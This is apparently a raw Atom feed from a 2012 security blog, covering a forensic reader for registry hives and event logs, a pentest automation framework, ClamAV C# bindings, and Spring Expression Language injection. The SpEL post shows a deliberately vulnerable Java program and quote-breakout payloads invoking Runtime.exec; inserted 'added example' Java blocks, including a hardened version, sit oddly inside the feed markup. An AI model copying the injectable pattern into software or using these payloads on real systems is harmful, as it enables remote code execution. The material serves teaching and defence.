gd:etag="W/&quot;DkIBSXk5cSp7ImA9WhNVE0w.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-5289621857836111549</id><published>2012-12-23T20:02:00.003-06:00</published><updated>2012-12-23T20:02:38.729-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-23T20:02:38.729-06:00</app:edited><title>Added environment variable recovery from pagefiles to volatile reader</title><content type="html">I added string search support to page files inside volatile reader, and used that as an opportunity to add environment variable recovery as well. 
The following pagefile was taken from a 64-bit Windows 7 VM and was 4.3 GB. The code is on GitHub.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-bvgK_fof5jc/UNe3gNepjrI/AAAAAAAAAOo/-c8axALxhf8/s1600/env_var_recovery.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://1.bp.blogspot.com/-bvgK_fof5jc/UNe3gNepjrI/AAAAAAAAAOo/-c8axALxhf8/s640/env_var_recovery.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/5fmtNkvB3KY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/5289621857836111549/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/12/added-environment-variable-recovery.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/5289621857836111549?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/5289621857836111549?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/5fmtNkvB3KY/added-environment-variable-recovery.html" title="Added environment variable recovery from pagefiles to volatile reader" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-bvgK_fof5jc/UNe3gNepjrI/AAAAAAAAAOo/-c8axALxhf8/s72-c/env_var_recovery.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/12/added-environment-variable-recovery.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMARno5eyp7ImA9WhNREEs.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-4126644058915973836</id><published>2012-11-04T16:34:00.000-06:00</published><updated>2012-11-04T16:34:07.423-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-11-04T16:34:07.423-06:00</app:edited><title>evtx support pretty much 
added</title><content type="html">The evtx format was a real PITA. It took me way longer than I expected to write the code to parse the offline logs. The results are not shown in the UI yet, but I checked in support for reading offline evtx files today. For now it only prints the parsed data to the console.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://github.com/brandonprry/volatile_reader"&gt;https://github.com/brandonprry/volatile_reader&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/5Lckff-Os2Q" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/4126644058915973836/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/11/evtx-support-pretty-much-added.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/4126644058915973836?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/4126644058915973836?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/5Lckff-Os2Q/evtx-support-pretty-much-added.html" title="evtx support pretty much added" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/11/evtx-support-pretty-much-added.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUYNR3s9fip7ImA9WhNSFUs.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-1897280898046628008</id><published>2012-10-29T21:19:00.004-06:00</published><updated>2012-10-29T21:19:56.566-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-29T21:19:56.566-06:00</app:edited><title>volatile_reader reads legacy evt files</title><content type="html">&lt;a href="https://github.com/brandonprry/volatile_reader" target="_blank"&gt;volatile_reader&lt;/a&gt; 
now reads &lt;a href="https://github.com/brandonprry/volatile_reader/commit/3cafaf49c480a2d7e31c02ea4ca014c8afba97a7" target="_blank"&gt;legacy XP evt files&lt;/a&gt;. evtx up next!&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/1CxVUnORsnw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/1897280898046628008/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/10/volatilereader-reads-legacy-evt-files.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1897280898046628008?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1897280898046628008?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/1CxVUnORsnw/volatilereader-reads-legacy-evt-files.html" title="volatile_reader reads legacy evt files" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/10/volatilereader-reads-legacy-evt-files.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YGQ3k4fyp7ImA9WhNSFEo.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-3190458634205103634</id><published>2012-10-28T18:38:00.003-06:00</published><updated>2012-10-28T18:38:42.737-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-28T18:38:42.737-06:00</app:edited><title>Introducing volatile_reader</title><content type="html">Today I decided I was going 
to write a small offline registry reader in C# using GTK for the UI. I intend to add both evt and evtx support as well, but these will come later.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/--xWaW29Re7g/UI3P-w9m0SI/AAAAAAAAAOI/fXVbiXN9JPQ/s1600/VolatileReader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/--xWaW29Re7g/UI3P-w9m0SI/AAAAAAAAAOI/fXVbiXN9JPQ/s320/VolatileReader.png" width="256" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
In order to read the hives, I wrote a small library included with the utility called VolatileReader.Registry. It is super fast and efficient: it uses a BinaryReader to seek around and read the hive in place rather than reading the whole hive into memory and then parsing it. All you must do is pass the constructor of RegistryHive the path to your hive:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;RegistryHive hive = new RegistryHive(file);&lt;/pre&gt;
&lt;br /&gt;
You can check out the code here:&amp;nbsp;&lt;a href="https://github.com/brandonprry/volatile_reader"&gt;https://github.com/brandonprry/volatile_reader&lt;/a&gt;&lt;br /&gt;
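&lt;br /&gt;
As an added example (not the post's own code and not from volatile_reader), the same seek-and-read idea in Java: only the 512-byte REGF base block and the first six bytes of the root cell are read, the header checksum is verified, and the primary and secondary sequence numbers are compared, which tells you whether the hive was flushed cleanly or whether its transaction logs still need to be applied before the contents are trusted. The class name, field names and the sample hive written to a temp file are constructed for this example.

```java
import java.io.IOException;
import java.io.RandomAccessFile;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.time.Instant;

// Hypothetical reader for the REGF base block and root cell (added example, not volatile_reader).
public class HiveBaseBlock {
    static final int HBINS_START = 0x1000;                  // base block is one 4 KiB page; hbins follow it
    static final long FILETIME_UNIX_OFFSET = 11644473600L;  // seconds from 1601-01-01 to 1970-01-01

    public final int primarySeq, secondarySeq, majorVersion, minorVersion, rootCellOffset;
    public final Instant lastWritten;
    public final String fileName, rootCellSignature;
    public final boolean checksumValid;

    // Little-endian view of 'len' bytes at 'pos'; the rest of the hive stays on disk.
    static ByteBuffer readAt(RandomAccessFile raf, long pos, int len) throws IOException {
        byte[] buf = new byte[len];
        raf.seek(pos);
        raf.readFully(buf);
        return ByteBuffer.wrap(buf).order(ByteOrder.LITTLE_ENDIAN);
    }

    public HiveBaseBlock(Path hive) throws IOException {
        try (RandomAccessFile raf = new RandomAccessFile(hive.toFile(), "r")) {
            ByteBuffer base = readAt(raf, 0, 0x200);
            String signature = new String(base.array(), 0, 4, StandardCharsets.US_ASCII);
            if (!signature.equals("regf")) {
                throw new IOException("not a registry hive, signature was " + signature);
            }
            primarySeq = base.getInt(4);
            secondarySeq = base.getInt(8);
            lastWritten = fromFiletime(base.getLong(12));
            majorVersion = base.getInt(20);
            minorVersion = base.getInt(24);
            rootCellOffset = base.getInt(36);           // relative to HBINS_START
            fileName = new String(base.array(), 48, 64, StandardCharsets.UTF_16LE).replace("\u0000", "");
            checksumValid = computeChecksum(base) == base.getInt(0x1FC);

            // Root key: int32 cell size (negative = allocated) followed by the "nk" signature.
            ByteBuffer cell = readAt(raf, HBINS_START + rootCellOffset, 6);
            rootCellSignature = new String(cell.array(), 4, 2, StandardCharsets.US_ASCII);
        }
    }

    // A hive whose sequence numbers differ was not flushed cleanly; replay its .LOG files first.
    public boolean isDirty() { return primarySeq != secondarySeq; }

    // XOR of the 127 DWORDs that precede the checksum field, with the two reserved results remapped.
    static int computeChecksum(ByteBuffer base) {
        int xor = 0;
        for (int off = 0; off != 0x1FC; off += 4) {
            xor ^= base.getInt(off);
        }
        if (xor == 0xFFFFFFFF) return 0xFFFFFFFE;
        if (xor == 0) return 1;
        return xor;
    }

    static Instant fromFiletime(long filetime) {   // 100 ns ticks since 1601-01-01
        return Instant.ofEpochSecond(filetime / 10_000_000L - FILETIME_UNIX_OFFSET,
                                     (filetime % 10_000_000L) * 100);
    }

    static void putBytes(ByteBuffer b, int at, byte[] data) {
        for (int i = 0; i != data.length; i++) b.put(at + i, data[i]);
    }

    // Constructed sample (not a real hive): a base block with a clean sequence pair and one hbin.
    static Path writeSampleHive() throws IOException {
        ByteBuffer hive = ByteBuffer.allocate(0x2000).order(ByteOrder.LITTLE_ENDIAN);
        putBytes(hive, 0, "regf".getBytes(StandardCharsets.US_ASCII));
        hive.putInt(4, 7);                              // primary sequence number
        hive.putInt(8, 7);                              // secondary; equal means a clean flush
        hive.putLong(12, 130000000000000000L);          // FILETIME for 2012-12-14T23:06:40Z
        hive.putInt(20, 1);                             // major version
        hive.putInt(24, 3);                             // minor version
        hive.putInt(36, 0x20);                          // root cell: first cell after the 32-byte hbin header
        hive.putInt(40, 0x1000);                        // hive bins data size
        putBytes(hive, 48, "SAMPLE_HIVE".getBytes(StandardCharsets.UTF_16LE));
        hive.putInt(0x1FC, computeChecksum(hive));
        putBytes(hive, HBINS_START, "hbin".getBytes(StandardCharsets.US_ASCII));
        hive.putInt(HBINS_START + 8, 0x1000);           // size of this hbin
        hive.putInt(HBINS_START + 0x20, -0x50);         // root cell size, negative = in use
        putBytes(hive, HBINS_START + 0x24, "nk".getBytes(StandardCharsets.US_ASCII));
        Path path = Files.createTempFile("sample", ".hiv");
        Files.write(path, hive.array());
        return path;
    }

    public static void main(String[] args) throws IOException {
        Path sample = writeSampleHive();
        HiveBaseBlock h = new HiveBaseBlock(sample);
        Files.delete(sample);
        System.out.println(h.fileName + " v" + h.majorVersion + "." + h.minorVersion
                + " written " + h.lastWritten + " checksum ok=" + h.checksumValid
                + " dirty=" + h.isDirty() + " root cell=" + h.rootCellSignature);
    }
}
```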
&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/tiiSpUEEUp0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/3190458634205103634/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/10/introducing-volatilereader.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3190458634205103634?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3190458634205103634?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/tiiSpUEEUp0/introducing-volatilereader.html" title="Introducing volatile_reader" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/--xWaW29Re7g/UI3P-w9m0SI/AAAAAAAAAOI/fXVbiXN9JPQ/s72-c/VolatileReader.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/10/introducing-volatilereader.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkQASH0yeSp7ImA9WhNTGEk.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-4647756566655910573</id><published>2012-10-21T11:20:00.000-06:00</published><updated>2012-10-21T11:25:49.391-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-21T11:25:49.391-06:00</app:edited><title>Introducing rising_sun</title><content type="html">I have recently &lt;a 
href="https://github.com/brandonprry/rising_sun"&gt;open-sourced a personal project&lt;/a&gt; of mine that I have used as an automated security test bed of sorts. Using bindings I have written for popular pieces of software, I have written a small framework for automating these tools and passing their relevant data from one tool to the next. A general architecture overview follows. Most of the tools are free and open source.&lt;br /&gt;
&lt;br /&gt;
The framework has three main parts: an API (needs a lot of work), a Web UI (kind of OK), and a Service (solid, small; runs and manages the Profiles and Scans). It is written in C# and ASP.NET, so it is cross platform (I develop on Linux using monodevelop). Most of the tools are in scripting languages or are also cross-platform. It uses PGSql as the DB backend and FluentNHibernate for persistence. In order to automate OpenVAS, Nexpose, Nessus, and Metasploit, I am using my &lt;a href="https://github.com/brandonprry/openvas-sharp"&gt;openvas-sharp&lt;/a&gt;, &lt;a href="https://github.com/brandonprry/nexpose-sharp"&gt;nexpose-sharp&lt;/a&gt;, &lt;a href="https://github.com/brandonprry/nessus-sharp"&gt;nessus-sharp&lt;/a&gt;, and &lt;a href="https://github.com/brandonprry/metasploit-sharp"&gt;metasploit-sharp&lt;/a&gt; bindings.&lt;br /&gt;
&lt;br /&gt;
When you create a profile via the Web UI, the scan of the profile takes place in two parts, breadth and depth. First, the service gathers as much of the host's surface area as possible. This is called the Profile phase. Once the host has been profiled and its attack surface figured out, we move on to the Scan phase, where we actively attempt to find vulns using the surface area we determined in the previous phase.&lt;br /&gt;
&lt;br /&gt;
Current tools automated during the Profile phase are Nmap (in a few incarnations), Nikto, sslscan, onesixtyone, smbclient, and a few others off the top of my head, with more web fingerprinting and other tools in the pipeline (MBSA is one). smbclient will loop through each share it can find, attempt to log in anonymously (unless creds are provided), and run "ls;recurse", which tells smbclient to list all files on the share. This phase can be considered mostly passive and can be run on its own with no Scan attached.&lt;br /&gt;
&lt;br /&gt;
Current tools automated during the Scan phase are OpenVAS, Nexpose, Nessus, Metasploit/Pro, Wapiti, DSXS, and SQLMap. This phase is by far the most important and integrative. We use all the data collected in the previous Profile to decide what to scan. By using as many vuln scanners (OpenVAS, Nexpose, and Nessus) as possible, you get far better results in terms of deducing false positives and false negatives (2 out of 3 report this, 33% chance false positive; 1 out of 3 report that, 66% chance false positive). This phase is laid out like a pyramid, with Metasploit on top. Before Wapiti and SQLMap are run, your vuln assessment scans are kicked off. As these run, we fuzz any web services we know about with Wapiti (not just ports 80 and 443, anything Nmap decided was http). We take the XML report it creates (you must run Wapiti from trunk), parse it to figure out exactly what Wapiti found, and pass the relevant details on to SQLMap and DSXS to figure out exactly how to exploit any SQL injection or XSS vulnerabilities. I use some novel methods to ensure SQLMap only tests what Wapiti found to be vulnerable, so it is pretty quick, and can be made quicker with a few tweaks. This requires a Profile to have been run.&lt;br /&gt;
&lt;br /&gt;
In the end, the data from Wapiti, OpenVAS, Nessus, and Nexpose is fed into Metasploit by mounting the remote /tmp locally via sshfs. Then a Metasploit Pro discovery is done, then a quick bruteforce, then an exploit task is started using all the data from the previous scans. Once this is done, the Scan phase is over and persisted, and your results will be in the web UI.&lt;br /&gt;
&lt;br /&gt;
Not all tools are required: if you don't have access to Metasploit Pro, you can simply choose not to run it. The same goes for OpenVAS, Nexpose, and Nessus. It is granular to that point. You may also choose to skip the web assessment and only run the general vuln assessment(s).&lt;br /&gt;
&lt;br /&gt;
Most of the data collected is presented in the UI in some form or fashion, but not all of it is. Installation isn't straightforward, so please read the &lt;a href="https://github.com/brandonprry/rising_sun/blob/master/README.md"&gt;README&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Generally I run against: a vulnerable FreeNAS distro, Metasploitable2 with TWiki removed, BadStore, and a vulnerable Windows XP SP2 machine.&lt;br /&gt;
&lt;br /&gt;
Please hit me up on IRC (bperry on Freenode, idle in #metasploit) if you have trouble setting up (you probably will, but I hope you don't!).&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/rTqlMRnDti4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/4647756566655910573/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/10/introducing-risingsun.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/4647756566655910573?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/4647756566655910573?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/rTqlMRnDti4/introducing-risingsun.html" title="Introducing rising_sun" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/10/introducing-risingsun.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YFQHgzfip7ImA9WhNTEU0.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-6752066560446822837</id><published>2012-10-12T23:48:00.002-06:00</published><updated>2012-10-13T00:18:31.686-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-13T00:18:31.686-06:00</app:edited><title>Integrating ClamAV into your C# applications</title><content type="html">During the VP debate, I decided to write &lt;a href="https://github.com/brandonprry/clam-sharp/"&gt;some ClamAV 
bindings&lt;/a&gt; for C# that were up to date. The current C# lib for libclamav that is linked on the ClamAV website is from 2005 and no longer useful. Here is a small introduction.

&lt;br /&gt;&lt;br /&gt;

The main objects you will work with as a programmer are ClamEngine and ClamResult. Since we are interfacing with a library written in C, we must take care not to leak native memory. ClamEngine implements IDisposable and is intended to be used in the context of a using statement. If you are using .NET 1.1 and do not have the using statement available, you will need to call Dispose() explicitly. Here is an example application:

&lt;pre&gt;
using System;
using clamsharp;

namespace testing
{
    class MainClass
    {
        public static void Main (string[] args)
        {
            using (ClamEngine e = new ClamEngine())
            {
                foreach (string file in args)
                {
                    ClamResult result = e.ScanFile(file); //pretty simple!

                    if (result != null &amp;&amp; result.ReturnCode == ClamReturnCode.CL_VIRUS)
                        Console.WriteLine("Found: " + result.VirusName);
                    else
                        Console.WriteLine("File Clean!");
                }
            } //engine is disposed of here and the allocated engine freed
        }
    }
}
&lt;/pre&gt;

One note: if you want it to build on Windows, you will need to change the DllImport attributes in ClamBindings to point to wherever libclamav lives on your Windows system.
&lt;br /&gt;&lt;br /&gt;
clamd TCP bindings are probably on their way soon; it will be easy enough. The main code is thoroughly documented, but if you still have questions after that, feel free to ask on &lt;a href="https://github.com/brandonprry/clam-sharp/"&gt;Github&lt;/a&gt;.
&lt;br /&gt;&lt;br /&gt;
If you would like to test this without a real virus, I recommend using &lt;a href="http://en.wikipedia.org/wiki/EICAR_test_file"&gt;EICAR&lt;/a&gt;.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/hLh8rMeYVP0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/6752066560446822837/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/10/integrating-clamav-into-your-c.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/6752066560446822837?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/6752066560446822837?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/hLh8rMeYVP0/integrating-clamav-into-your-c.html" title="Integrating ClamAV into your C# applications" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/10/integrating-clamav-into-your-c.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkAGQHo9fSp7ImA9WhJUFU0.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-3723104738257873753</id><published>2012-09-12T19:28:00.001-06:00</published><updated>2012-09-12T19:45:21.465-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-09-12T19:45:21.465-06:00</app:edited><title>Theoretical vulnerabilities using the Spring Expression Language</title><content type="html">The past two days, I have been taking 
Core Spring training (work paid for it, why not). Our instructor ended up bringing up the Spring Expression Language (or SpEL), and showed us how it could be used to parse values and various other things.
&lt;br /&gt;&lt;br /&gt;
While playing around with it, I was curious whether I could evaluate Java code at runtime that would execute calc.exe, and after a few minutes of tinkering, I was able to execute calc.exe via the Spring Expression Language. It was easy enough:
&lt;br /&gt;&lt;br/&gt;
&lt;pre&gt;
ExpressionParser p = new SpelExpressionParser(); 
Expression e = p.parseExpression("T(Runtime).getRuntime().exec('calc.exe')"); //set expression to eval 
e.getValue(); //eval
&lt;/pre&gt;
&lt;br /&gt;
Once I had this bit figured out, I realised the potential for Remote Command Execution via the expression language. The way to get a program using the Spring Expression Language to evaluate unintended code is very similar to the way a SQL injection works, but there are some catches and nuances, and I will go over them here. This whole post is theoretical only, as I have never actually come across this vulnerability before. However, it would be easy for a programmer not completely familiar with how the expression language works to write vulnerable code that allowed remote code execution.
&lt;br /&gt;&lt;br /&gt;
For instance, take the following code:
&lt;br /&gt;&lt;br /&gt;
&lt;pre&gt;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Date;

public class main {

    public static void main(String[] args) throws Exception {
        ExpressionParser parser = new SpelExpressionParser();

        System.out.println("Please enter a date and I will parse it:");
        BufferedReader stdin = new BufferedReader(new InputStreamReader(System.in));
        String line = stdin.readLine();

        // the user's raw input is handed straight to the expression parser
        Expression exp = parser.parseExpression(line);
        Date date = (Date) exp.getValue();

        System.out.println(date.toString());
    }
}
&lt;/pre&gt;
&lt;br /&gt;

The vulnerability is obvious: the program does no checking whatsoever to ensure the user isn't inputting something they shouldn't. Simply typing:
&lt;br /&gt;&lt;br /&gt;
&lt;pre&gt;
T(Runtime).getRuntime().exec('calc.exe')
&lt;/pre&gt;
&lt;br /&gt;
would execute calc.exe, then error out since the string you passed in is obviously not a Date.
&lt;br /&gt;&lt;br /&gt;
Let's take the vulnerability a step further though. Let's modify the above code slightly.
&lt;br /&gt;&lt;br /&gt;
Turn the following:
&lt;br /&gt;&lt;pre&gt;
Expression exp = parser.parseExpression(line);
&lt;/pre&gt;
&lt;br /&gt;
into:
&lt;br /&gt;&lt;pre&gt;
Expression exp = parser.parseExpression("'" + line + "'");
&lt;/pre&gt;
&lt;br /&gt;&lt;br /&gt;
This code change technically fixes a bug in our code. In the previous code, if the user entered a Date that was &lt;b&gt;not&lt;/b&gt; surrounded by single-quotes, the application would error out. By adding the single-quotes in our code, the user can enter the Date value without the single-quotes. This also makes it a bit more difficult to exploit, though not impossible. In order to exploit this new code, we can think about this vulnerability as if it were a SQL injection vulnerability, with a few catches.
&lt;br /&gt;&lt;br /&gt;
We need to craft a semantically correct string that, when evaluated, "breaks out" of the quotes we have added to the codebase. To do this, we can use some of the operators the Spring Expression Language puts at our disposal.
&lt;br /&gt;&lt;br /&gt;
My first attempt to exploit the new code was to use the 'and' operator. This was fruitless since Java is a strongly-typed language and Java was trying to evaluate the strings as boolean values, which did not work. After a few more minutes, I figured out how to break out of the quotes and have Spring evaluate and execute my payload:
&lt;br /&gt;&lt;br /&gt;
&lt;pre&gt;
02/12/2012' == T(Runtime).getRuntime().exec('calc.exe').toString() + '
&lt;/pre&gt;
&lt;br /&gt;
The resulting string that gets eval'ed is this:
&lt;br /&gt;
&lt;pre&gt;
'02/12/2012' == T(Runtime).getRuntime().exec('calc.exe').toString() + ''
&lt;/pre&gt;
&lt;br /&gt;
Basically, I am asking Spring to evaluate whether the string to the left of my == operator is the same as my payload, which must be evaluated and executed before the comparison can happen. calc.exe gets executed and now I am happy.
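&lt;br /&gt;&lt;br /&gt;
As an added example that is not from the post or the linked gists, here is the defensive counterpart of the date program: the input is parsed as a date with java.time and never reaches the expression parser, and for the case where SpEL genuinely has to evaluate untrusted text, the evaluation runs under SimpleEvaluationContext, which Spring Framework added in 4.3.15 and 5.0.5 and which has no type locator, so T(...) references, constructor calls and bean references fail instead of running. The class name SafeDateParser and the strings fed to it in main are assumptions made for the example.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

import java.time.LocalDate;
import java.time.format.DateTimeFormatter;
import java.time.format.DateTimeParseException;
import java.time.format.ResolverStyle;

// Hypothetical hardened counterpart of the vulnerable "main" class above (added example).
public class SafeDateParser {

    // Fix 1 (preferred): the input is a date, so parse it as a date and nothing else.
    // The string never reaches an expression evaluator, so there are no quotes to break out of.
    // STRICT resolution plus whole-string parsing rejects trailing junk and rolled-over dates.
    private static final DateTimeFormatter DATE_FORMAT =
            DateTimeFormatter.ofPattern("MM/dd/uuuu").withResolverStyle(ResolverStyle.STRICT);

    public static LocalDate parseDate(String line) {
        return LocalDate.parse(line.trim(), DATE_FORMAT);   // throws DateTimeParseException
    }

    // Fix 2 (only if SpEL genuinely has to evaluate user-supplied text): a restricted context.
    // SimpleEvaluationContext (Spring 4.3.15 / 5.0.5 and later) has no TypeLocator, so any
    // T(...) reference throws SpelEvaluationException, and with no MethodResolver registered
    // no methods can be called either; literals, operators and property reads still work.
    private static final ExpressionParser PARSER = new SpelExpressionParser();

    public static Object evaluateRestricted(String expression) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        Expression exp = PARSER.parseExpression(expression);
        return exp.getValue(ctx);
    }

    public static void main(String[] args) {
        System.out.println(parseDate("02/12/2012"));            // 2012-02-12

        // The quote-breakout shape from the post is now just an unparseable date string.
        try {
            parseDate("02/12/2012' == 'x' + '");
        } catch (DateTimeParseException e) {
            System.out.println("rejected as a date: " + e.getMessage());
        }

        // A plain literal still evaluates under the restricted context...
        System.out.println(evaluateRestricted("'02/12/2012'"));

        // ...but a type reference is refused before anything behind it can run.
        try {
            evaluateRestricted("T(java.lang.System).getProperty('user.dir')");
        } catch (SpelEvaluationException e) {
            System.out.println("blocked: " + e.getMessageCode());  // TYPE_NOT_FOUND
        }
    }
}
```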
&lt;br/&gt;&lt;br /&gt;
